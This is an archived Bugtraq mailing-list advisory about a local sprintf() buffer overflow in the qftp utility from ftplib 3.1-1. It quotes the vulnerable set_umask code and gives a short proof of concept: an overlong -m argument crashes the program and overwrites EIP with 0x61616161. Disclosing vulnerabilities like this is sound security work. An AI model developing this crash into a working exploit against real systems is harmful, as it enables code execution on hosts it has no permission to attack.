lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <db4e96660703151127haa38015l8028a301bb8ac40e@mail.gmail.com>
Date: Thu, 15 Mar 2007 19:27:06 +0100
From: "starcadi starcadi" <starcadi@...il.com>
To: securityfocus <bugtraq@...urityfocus.com>
Subject: QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow

http://nbpfaus.net/~pfau/ftplib/

qftp is a utility that performs file transfers using ftplib based on
instructions presented on the command line.

>> Description

buffer overflow in sprintf(), set_umask don't check sizelen of passed argument.

>> Source error

in main():
337: 	  case 'm' : set_umask(optarg); break;
..
void set_umask(char *m)
{
    char buf[80];
    sprintf(buf,"umask %s", m);
    ftp_connect();
    FtpSite(buf, conn);
}

>> POC

$ gcc ftplib.c getopt.c qftp.c -o ftpsend
$ ftpsend localhost -l login -p passwd -m `perl -e "print 'a'x90"`
Segmentation fault

# eip addr: $1 = (void *) 0x61616161

-- 
~ starcadi

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ